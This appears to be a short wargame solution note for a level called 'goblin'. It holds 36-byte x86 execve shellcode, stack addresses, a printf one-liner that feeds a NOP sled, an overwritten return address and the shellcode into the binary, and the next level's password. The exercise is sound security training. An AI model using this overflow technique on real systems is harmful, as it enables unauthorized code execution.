<shellcode>

	\x31\xc0\x50\x68\x70\x61\x73\x73\x68\x2f\x6d\x79\x2d\x68\x2f\x62\x69\x6e\x50\x8d\x5c\x24\x04\x53\xb0\x0b\x8b\x1c\x24\x8d\x0c\x24\x31\xd2\xcd\x80

	length: 36

</shellcode>

<ebp, ret, beyond>

	ebp: 0xbffffb18
	ret: 0xbffffb1c
	beyond: 0xbffffb20

</ebp, ret, beyond>

<command>

	printf "$(for x in `seq 1 20`; do printf "\x90"; done)$(printf "\x20\xfb\xff\xbf")$(printf "\x31\xc0\x50\x68\x70\x61\x73\x73\x68\x2f\x6d\x79\x2d\x68\x2f\x62\x69\x6e\x50\x8d\x5c\x24\x04\x53\xb0\x0b\x8b\x1c\x24\x8d\x0c\x24\x31\xd2\xcd\x80")"| ./goblin

</command>

<next>

	id: goblin
	pw: hackers proof

</next>